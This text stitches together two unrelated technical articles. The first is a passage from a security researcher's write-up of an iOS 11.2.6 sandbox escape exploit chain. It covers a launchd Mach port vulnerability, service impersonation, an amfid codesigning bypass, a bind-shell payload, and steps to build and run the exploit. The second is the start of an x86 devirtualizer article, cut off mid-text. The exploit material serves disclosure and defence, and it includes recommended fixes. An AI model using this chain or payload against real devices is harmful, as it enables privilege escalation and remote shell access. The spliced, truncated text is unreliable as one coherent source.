            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied bytask_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORTspecial port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASHexceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abortfunction.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASHexception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASHEXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identitymessage that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look atconvert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESSexception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawnto launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Project: x86-devirt

Unpackme — x86 Virtualizer

Today, I am going to be going through how x86devirt works to disassemble and devirtualize the behaviour of code obfuscated using the x86virt virtual machine. I needed several tools to complete this task, the development of which will be covered in this article.

A code virtualizer protects code behaviour by retargeting some subroutines or sections of code from the x86/x64 platform (which is well understood and documented) into a (usually somewhat random) platform that we do not understand. Additionally, the tools we use to discover and analyze behaviour in executable code (such as radare2 or x64dbg) also do not understand it well. This makes identifying malicious behaviour, developing generic signatures or extracting other behavioral details from the code impossible without reversing the process in some way.

While it costs a large overhead in performance, obfuscation using code virtualization is very effective. Depending on the complexity of the protector/virtualizer, these packers can be very painful and tedious to work through.

Resources

You can see the final product (devirtualizer) of this article at the following GitHub URL: https://github.com/JeremyWildsmith/x86devirt

We are reverse engineering an unpackme by ReWolf at the following URL: https://tuts4you.com/download/1850/

This sample has been packed with an open-source application by ReWolf that is publicly posted on GitHub at the following URL: https://github.com/rwfpl/rewolf-x86-virtualizer

If you would like to look at a very simple example of a virtual machine, I have a project up on my GitHub that demonstrates the basic function of a VM Stub and you can see how exactly it works. The project is located at the following URL: https://github.com/JeremyWildsmith/StackLang

Tools / Knowledge

In this article I am going to use the following tools & knowledge:

  • The disassembler, written in the C++ programming language
  • x86 Intel Assembly
  • YARA Signatures
  • The udis86 library, used to disassemble x86 instructions
  • Python, used to automate x64dbg and the x64dbgpy plugin, as well as run Angr simulations to extract the jmp mappings
  • The x86virt unpackme sample by ReWolf on tuts4you.com (https://tuts4you.com/download/1850/)

How the x86virt VM Works

Before I dive into how x86devirt works, I am going to give a brief overview on my findings of how the x86virt VM works.

x86virt starts by taking the application to be protected and grabbing some subroutines that it has decided to protect. The x86 code for these subroutines is translated into an instruction set that uses the following format:

(Instruction Size)(Instruction Prefix)(Instruction Data)

  • Instruction Size — The size in bytes of the instruction
  • Instruction Prefix — This is 0xFFFF if the instruction is a VM instruction. Otherwise, the remaining bytes in the instruction data (and instruction prefix) should be interpreted as a x86 instruction
  • Instruction Data — If (Instruction Prefix) is 0xFFFF, this is the VM Opcode bytes followed by the operand bytes. Otherwise, these bytes are appended to the (Instruction Prefix) to form a valid x86 instruction.

For every VM Layer or virtualized target, x86virt randomizes the opcodes for that VM. So when we devirtualize, we need to map the opcodes to their respective VM instruction.

x86virt also takes instructions like the ones below:

mov eax, [esp + 0x8]

And translates them into something like this:

mov VMR, 0x8
add VMR, esp
mov eax, [VMR]

VMR is a register that only exists in the virtual machine, so during devirtualization, we need to interpret this and translate it back into its original form.

Finally, x86virt encrypts the entire instruction using an encryption algorithm that is, to some extent, randomized. Every time an instruction is executed, it is first decrypted and then interpreted. However, there is one consistency with instruction encryption between targets and VM layers: regardless of how the instruction was encrypted, in its encrypted form, the first byte XORed with the second byte will always give you the instruction length.

Another important note regarding instruction encryption is that the key to decrypt it is the address of that VM instruction relative to the start of the virtual function/code stub it belongs to. In other words, the key is the offset to that instruction in the function that has been virtualized. This means you cannot just blindly decrypt all the instructions in a function. You must do proper control flow analysis to determine where in memory the valid bytecode instructions are by identifying and following conditional or unconditional jumps.

So to disassemble an x86virt VM instruction, we must know:

  1. The size of the instruction
  2. The offset to that instruction
  3. The encryption algorithm (because it is somewhat random)

There is one last piece of the puzzle that we must consider when disassembling x86virt VM code. The conditional jumps for x86virt VM are encoded with a jump type operand. The part of the code that interprets the jump type operand is also somewhat random between VM layers and virtualized targets. We need to handle this case in our devirtualizer as well.

The x86devirt Disassembler

An important part to the x86-devirtualizer is the disassembler. The role of this module is to take a stub of virtualized, encrypted x86virt bytecode that has been extracted from the protected application and produce a NASM x86 Assembly translation of the encrypted bytecode. To do this, it needs a few pieces of information from the protected application:

  1. A dump of the decryption algorithm that the VM stub uses to decrypt VM instruction before interpreting them
  2. The mappings of opcodes to their respective behaviour, since the opcodes are randomized (i.e, 0x33 maps to add, 0x22 maps to mov)
  3. The mappings of jmp type operand to their respective jump behavior (i.e, jmp type 2 maps to je, 3 maps to jne, etc…)
  4. A dump of the function / stub of code to be devirtualized

We will see how this information is extracted by looking at the x86devirt.py x64dbg plugin later, but for now we will assume we have been provided this information.

The first step is to get the instruction length, decrypt the instruction and then identify whether we should interpret the instruction as an x86 instruction or a VM bytecode instruction. We see this being done in disassemblers’ decodeVmInstruction method:

unsigned int decodeVmInstruction(vector<DecodedVmInstruction>& decodedBuffer, uint32_t vmRelativeIp, VmInfo& vmInfo) {

    uint32_t instrLength = getInstructionLength(vmInfo.getBaseAddress() + vmRelativeIp, vmInfo);

    //Read with offset 1, to trim off instr length byte
    unique_ptr<uint8_t[]> instrBuffer = vmInfo.readMemory(vmInfo.getBaseAddress() + vmRelativeIp + 1, instrLength);
    vmInfo.decryptMemory(instrBuffer.get(), instrLength, vmRelativeIp);

    DecodedInstructionType_t instrType = DecodedInstructionType_t::INSTR_UNKNOWN;

    if(*reinterpret_cast<unsigned short*>(instrBuffer.get()) == 0xFFFF) {
        //Offset by 2 which removes the 0xFFFF part of the instruction.

        //Map instructions correctly
        instrBuffer[2] = vmInfo.getOpcodeMapping(instrBuffer[2]);
        decodedBuffer = disassembleVmInstruction(instrBuffer.get() + 2, instrLength - 2, vmRelativeIp, vmInfo);
    } else {
        decodedBuffer = disassemble86Instruction(instrBuffer.get(), instrLength, vmInfo.getBaseAddress() + vmRelativeIp);
    }

    return instrLength + 1;
}

We see that the size is extracted using the getInstructionLength method (this will simply XOR the first two bytes to get the length). After that, the instruction is decrypted by using the dumped decryption subroutine extracted from the protected application (a more proper approach would be to emulate the code rather than directly executing it). Finally, we examine the first word to identify how to decode the instruction (as an x86 instruction or as a VM instruction). If the instruction is a VM bytecode instruction, we need to look up the opcode in the opcode mapping to determine what behaviour it maps to.

The way we disassemble x86 instructions is by using the udis86 library, and also keeping some basic information about the disassembled instruction. You can see how that is done below:

vector<DecodedVmInstruction> disassemble86Instruction(const uint8_t* instrBuffer, uint32_t instrLength, const uint32_t instrAddress) {
    DecodedVmInstruction result;
    result.isDecoded = false;
    result.address = instrAddress;
    result.controlDestination = 0;
    result.size = instrLength;

    memcpy(result.bytes, instrBuffer, instrLength);

    ud_set_input_buffer(&ud_obj, instrBuffer, instrLength);
    ud_set_pc(&ud_obj, instrAddress);
    unsigned int ret = ud_disassemble(&ud_obj);
    strcpy(result.disassembled, ud_insn_asm(&ud_obj));

    if(ret == 0)
        result.type = DecodedInstructionType_t::INSTR_UNKNOWN;
    else
        result.type = (!strncmp(result.disassembled, "ret", 3) ? DecodedInstructionType_t::INSTR_RETN : DecodedInstructionType_t::INSTR_MISC);

    vector<DecodedVmInstruction> resultSet;
    resultSet.push_back(result);

    return resultSet;
}

